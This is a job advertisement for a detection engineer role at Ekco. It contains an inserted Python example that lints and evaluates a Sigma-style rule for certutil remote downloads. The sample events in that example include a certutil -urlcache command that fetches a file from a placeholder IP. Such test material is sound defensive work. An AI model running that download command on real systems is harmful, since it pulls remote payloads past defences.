Threat Detection Engineer
London, United Kingdom
Ekco
We're innovators in security and cloud solutions & management services, designed to drive productivity and scalability.
About Ekco
🚀 Founded in 2016, Ekco is now one of the fastest growing cloud solution providers in Europe!
We specialise in enabling companies to progress along the path of cloud maturity, managing transformation and driving better outcomes from our clients’ existing technology investments.
☁️ In a few words, we take businesses to the cloud and back!
🌍 We have over 1000 highly talented and supportive colleagues (and counting) across a number of regional offices in the UK, Benelux, South Africa, Malaysia & Ireland.
The role
As a Detection Engineer, your primary objective is to design, develop, test, and maintain high-fidelity threat detection content across our Managed Detection and Response (MDR) service stack. You will operationalise threat intelligence, close detection gaps, and contribute to the continuous improvement of our SOC's threat detection capability. This role is pivotal in ensuring our SOC Analysts are equipped with actionable, reliable alerts to identify and respond to cyber threats effectively.
Reporting to the Head of SOC – UK, the Detection Engineer will develop, deploy, and maintain the Ekco MSS detection use case library.
Key Responsibilities
- Developing, testing, and maintaining detection logic across platforms such as Microsoft Sentinel, CrowdStrike, and Defender for Endpoint.
- Writing and tuning detection rules using languages such as Kusto Query Language (KQL), Sigma, or other relevant syntax.
- Continuously tuning and refining detection rules to reduce false positives and enhance detection efficacy.
- Conducting threat hunts and detection gap assessments based on adversary TTPs, incident reviews, and cyber threat intelligence.
- Working closely with SOC Analysts to assess detection performance and enhance rule logic based on investigation outcomes.
- Participating in red and blue team exercises to validate the effectiveness of detection coverage and controls.
- Collaborating with SIEM architects to establish and enforce best practices around data schema and detection logic implementation.
- Supporting the configuration and improvement of SOAR playbooks to aid in alert triage, enrichment, and automated response.
- Leveraging version control (e.g., Git) and CI/CD pipelines to manage and deploy detection content at scale.
- Performing validation of new or updated detection rules contributed by internal or external stakeholders.
- Documenting detection logic, including rationale, associated TTPs, and investigation guidance.
- Supporting compliance and audit efforts through accurate documentation and reporting of detection controls.
- Collaborating with Threat Intelligence, Incident Response, and Customer Success teams to align detection coverage with the threat landscape and client risk profile.
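As a concrete illustration of the detection-as-code workflow the responsibilities above describe (authoring a Sigma rule, validating it before merge, and checking it against telemetry), the following is an added example; it is not Ekco's code and not part of the original posting. The rule is a hypothetical certutil remote-download detection written as a Python dict that mirrors Sigma's YAML layout (a real pipeline would keep the YAML and convert it with pySigma to KQL or CQL), and the process-creation events are constructed, not real telemetry. Only a subset of Sigma semantics is implemented: the contains/startswith/endswith modifiers, list values as OR, map keys as AND, and conditions of the form "selection and not filter".

```python
"""Minimal Sigma-style rule linter and evaluator using only the standard library."""
import re
import uuid

# Constructed example rule (hypothetical content, not an Ekco rule).
RULE = {
    "title": "certutil Used to Fetch Remote Content",
    "id": "3f6c1b2e-8a4d-4c5e-9b1f-2d7e6a5c4b3a",
    "description": "Detects certutil.exe with urlcache/verifyctl, a common LOLBin download technique.",
    "tags": ["attack.command_and_control", "attack.t1105"],
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains": ["urlcache", "verifyctl"],
        },
        # Tuning: local file:// fetches from internal PKI are expected and excluded.
        "filter_local": {"CommandLine|contains": "file://"},
        "condition": "selection and not filter_local",
    },
    "falsepositives": ["Administrators fetching certificates from internal PKI"],
    "level": "high",
}

LEVELS = {"informational", "low", "medium", "high", "critical"}
TECHNIQUE_TAG = re.compile(r"^attack\.t\d{4}(\.\d{3})?$")


def lint_rule(rule):
    """Pre-merge checks; returns a list of problems (empty means the rule passes)."""
    problems = []
    for field in ("title", "id", "logsource", "detection", "level"):
        if field not in rule:
            problems.append(f"missing required field: {field}")
    try:
        uuid.UUID(str(rule.get("id")))
    except ValueError:
        problems.append("id is not a UUID")
    if rule.get("level") not in LEVELS:
        problems.append(f"invalid level: {rule.get('level')}")
    if not any(TECHNIQUE_TAG.match(t) for t in rule.get("tags", [])):
        problems.append("no MITRE ATT&CK technique tag (attack.tNNNN)")
    if "condition" not in rule.get("detection", {}):
        problems.append("detection has no condition")
    return problems


def _match_value(field_value, modifier, pattern):
    """Case-insensitive comparison, as Sigma specifies for string fields."""
    fv, p = str(field_value).lower(), str(pattern).lower()
    if modifier is None:
        return fv == p
    if modifier == "contains":
        return p in fv
    if modifier == "startswith":
        return fv.startswith(p)
    if modifier == "endswith":
        return fv.endswith(p)
    raise ValueError(f"unsupported modifier: {modifier}")


def _match_selection(selection, event):
    """Sigma map semantics: keys are ANDed, list values are ORed."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        patterns = patterns if isinstance(patterns, list) else [patterns]
        if not any(_match_value(event[field], modifier or None, p) for p in patterns):
            return False
    return True


def evaluate(rule, event):
    """Evaluate a condition of the form 'A' or 'A and not B' against one event."""
    det = rule["detection"]
    m = re.fullmatch(r"(\w+)(?: and not (\w+))?", det["condition"])
    if not m:
        raise ValueError(f"unsupported condition: {det['condition']}")
    sel, flt = m.group(1), m.group(2)
    hit = _match_selection(det[sel], event)
    if hit and flt:
        hit = not _match_selection(det[flt], event)
    return hit


# Constructed sample process-creation events (not real telemetry).
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f file://srv01/share/ca.crt ca.crt"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -hashfile notes.txt SHA256"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c echo urlcache"},
]


def run(rule=RULE, events=EVENTS):
    """Lint the rule, then return the indexes of the events that fire it."""
    problems = lint_rule(rule)
    if problems:
        raise ValueError("rule rejected: " + "; ".join(problems))
    return [i for i, e in enumerate(events) if evaluate(rule, e)]


if __name__ == "__main__":
    print("alerts on events:", run())  # -> [0]
```

Only the first event fires: the second is suppressed by the filter, the third has no download verb, and the fourth has the keyword but the wrong image. Wiring the lint step into a CI job on the rule repository is what turns this into the "validation of new or updated detection rules" mentioned above.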
Key Requirements
- At least 2 years' experience in a Detection Engineering, Threat Hunting, or SOC Analysis role with a focus on detection content development.
- Strong experience with SIEM platforms (e.g. Microsoft Sentinel, Falcon Next-Gen SIEM) and EDR technologies (e.g. CrowdStrike, Defender for Endpoint, SentinelOne).
- Proficiency in building detection logic using KQL, CrowdStrike Query Language (CQL), Sigma or equivalent query languages.
- A solid understanding of adversary behaviour, the cyber kill chain, and the MITRE ATT&CK framework.
- Practical experience analysing logs, events, and telemetry to identify detection opportunities.
- Familiarity with CI/CD methodologies, version control (Git), and scripting languages such as Python or PowerShell.
- Strong analytical and problem-solving skills, with the ability to break down complex attack scenarios into actionable detection strategies.
- Excellent communication skills – able to clearly articulate technical detail to both technical and non-technical stakeholders.
- The ability to prioritise, adapt, and remain effective in a fast-paced, service-oriented environment.
- A proactive mindset with a commitment to continuous improvement and innovation.
Desirable
- Experience working for a Managed Security Service Provider (MSSP).
- Contributions to open-source detection repositories (e.g., Sigma).
- Background in malware analysis or reverse engineering to inform detection logic.
- Exposure to red or purple team engagements.
- Understanding of log pipelines and data engineering concepts related to security telemetry.
Benefits/Perks
- ☀️ Time off - 25 days leave + public holidays
- 🎂 1 day birthday leave per year
- 💰 Company Pension Scheme (employer contribution 5%) + flexible salary sacrifice
- 📞 Employee Assistance Programme (EAP) - access to dedicated mental health, emotional wellbeing and general advice
- 🏃‍♀️ EkcOlympics - a global activity for fun!
- 📚 Learning & development - Unlimited access to Pluralsight learning platform
- 🌱 A lot of responsibilities & opportunities to grow (also internationally)
Why Ekco
- ⭐️ Microsoft’s 2023 Rising Star Security Partner of the year
- 🚀 VMware & Veeam top partner status
- 🏅 Ranked as 4th fastest growing technology company in the Deloitte Fast50 Awards
- 🌈Ekco are committed to cultivating an environment that promotes diversity, equality, inclusion and belonging
- 🎉 We recognise the value of internal mobility and encourage opportunities for internal development & progression
- ✨ Flexible working with a family friendly focus is at the core of our company values